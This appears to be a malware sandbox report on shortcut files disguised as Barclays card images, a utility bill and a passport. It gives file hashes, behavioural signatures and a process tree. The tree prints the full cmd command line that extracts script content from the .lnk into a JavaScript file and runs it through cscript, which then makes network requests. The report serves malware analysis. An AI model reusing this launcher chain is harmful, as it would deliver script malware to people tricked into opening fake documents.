Overview
overview
10Static
static
Barclays C...pg.lnk
windows7_x64
10Barclays C...pg.lnk
windows10-2004_x64
10Barclays C...pg.lnk
windows7_x64
10Barclays C...pg.lnk
windows10-2004_x64
10Barclays U...pg.lnk
windows7_x64
10Barclays U...pg.lnk
windows10-2004_x64
10Personal P...pg.lnk
windows7_x64
10Personal P...pg.lnk
windows10-2004_x64
10Analysis
-
max time kernel
147s -
max time network
145s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
04-02-2022 08:41
Static task
static1
Behavioral task
behavioral1
Sample
Barclays CC Back.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
Barclays CC Back.jpg.lnk
Resource
win10v2004-en-20220112
Behavioral task
behavioral3
Sample
Barclays CC Front.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
Barclays CC Front.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
Barclays Utility.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
Barclays Utility.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral7
Sample
Personal Passport.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral8
Sample
Personal Passport.jpg.lnk
Resource
win10v2004-en-20220112
General
-
Target
Barclays Utility.jpg.lnk
-
Size
95KB
-
MD5
48e90ca0f344e1a0445936f2d28ae01f
-
SHA1
ee050a767eaa5227ed40d7a77b7746aea0554ae5
-
SHA256
18558a236e6dc15447c4683d38d4cd5c65331f2469b95b65342a1dcc5e4999fe
-
SHA512
2dc34d7e2afb5571bb473c6598315097298b53674321be629443f51c2b0b3dbecfe4b6bfe010801dc36f8e146fed2fd440ee67538bedf4fb0c44fd109d0dc0dc
Malware Config
Signatures
-
Blocklisted process makes network request 13 IoCs
flow pid Process 3 1928 cscript.exe 6 1928 cscript.exe 7 1928 cscript.exe 9 1928 cscript.exe 10 1928 cscript.exe 11 1928 cscript.exe 12 1928 cscript.exe 13 1928 cscript.exe 15 1928 cscript.exe 16 1928 cscript.exe 19 1928 cscript.exe 20 1928 cscript.exe 21 1928 cscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1072 cmd.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 1128 wrote to memory of 1072 1128 cmd.exe 28 PID 1128 wrote to memory of 1072 1128 cmd.exe 28 PID 1128 wrote to memory of 1072 1128 cmd.exe 28 PID 1072 wrote to memory of 1220 1072 cmd.exe 29 PID 1072 wrote to memory of 1220 1072 cmd.exe 29 PID 1072 wrote to memory of 1220 1072 cmd.exe 29 PID 1220 wrote to memory of 536 1220 forfiles.exe 30 PID 1220 wrote to memory of 536 1220 forfiles.exe 30 PID 1220 wrote to memory of 536 1220 forfiles.exe 30 PID 1220 wrote to memory of 956 1220 forfiles.exe 31 PID 1220 wrote to memory of 956 1220 forfiles.exe 31 PID 1220 wrote to memory of 956 1220 forfiles.exe 31 PID 1072 wrote to memory of 1696 1072 cmd.exe 32 PID 1072 wrote to memory of 1696 1072 cmd.exe 32 PID 1072 wrote to memory of 1696 1072 cmd.exe 32 PID 1072 wrote to memory of 1704 1072 cmd.exe 33 PID 1072 wrote to memory of 1704 1072 cmd.exe 33 PID 1072 wrote to memory of 1704 1072 cmd.exe 33 PID 1072 wrote to memory of 316 1072 cmd.exe 34 PID 1072 wrote to memory of 316 1072 cmd.exe 34 PID 1072 wrote to memory of 316 1072 cmd.exe 34 PID 1072 wrote to memory of 1876 1072 cmd.exe 35 PID 1072 wrote to memory of 1876 1072 cmd.exe 35 PID 1072 wrote to memory of 1876 1072 cmd.exe 35 PID 1876 wrote to memory of 1168 1876 cscript.exe 37 PID 1876 wrote to memory of 1168 1876 cscript.exe 37 PID 1876 wrote to memory of 1168 1876 cscript.exe 37 PID 1168 wrote to memory of 1928 1168 cscript.exe 39 PID 1168 wrote to memory of 1928 1168 cscript.exe 39 PID 1168 wrote to memory of 1928 1168 cscript.exe 39
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Barclays Utility.jpg.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Barclays Utility.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"2⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\forfiles.exeforfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"3⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\system32\cmd.exe/c move "C:\Users\Admin\AppData\Local\Temp\Barclays CC Back.jpg.lnk" C:\Users\Admin\AppData\Local\Temp\1.lnk4⤵PID:536
-
-
C:\Windows\system32\cmd.exe/c move "C:\Users\Admin\AppData\Local\Temp\Barclays CC Front.jpg.lnk" C:\Users\Admin\AppData\Local\Temp\1.lnk4⤵PID:956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""3⤵PID:1696
-
-
C:\Windows\system32\find.exefind "RDE3"3⤵PID:1704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" rd a"3⤵PID:316
-
-
C:\Windows\system32\cscript.execScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"3⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js4⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js5⤵
- Blocklisted process makes network request
PID:1928
-
-
-
-